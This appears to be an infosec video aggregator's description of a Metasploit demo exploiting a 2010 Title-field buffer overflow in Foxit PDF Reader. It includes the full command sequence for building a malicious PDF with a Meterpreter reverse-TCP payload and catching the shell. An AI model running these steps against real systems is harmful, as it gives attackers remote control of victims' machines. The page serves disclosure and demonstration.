Description: Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
Timeline :
Vulnerability reported to vendor by offsec before the public release on Exploit-DB
Vendor released new version the 2010-09-29
dookie & Sud0 exploit release on Exploit-DB the 2010-11-13
Metasploit exploit released the 2010-11-22
Provided by:
dookie
Sud0
corelanc0d3r
jduck
References :
EDB-ID-15532
Affected versions :
Foxit PDF Reader prior to version 4.2.0.0928
Tested on Windows 7 Integral with :
Foxit PDF Reader 4.1.1.0805
Description:
This module exploits a stack buffer overflow in Foxit PDF Reader prior to version 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in the Title field. This results in overwriting a structured exception handler record. NOTE: This exploit does not use javascript.
Metasploit demo :
use exploit/windows/fileformat/foxit_title_bof
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
getuid
Owned
Tags: metasploit , foxit , pdf , 0day , exploit , microsoft ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.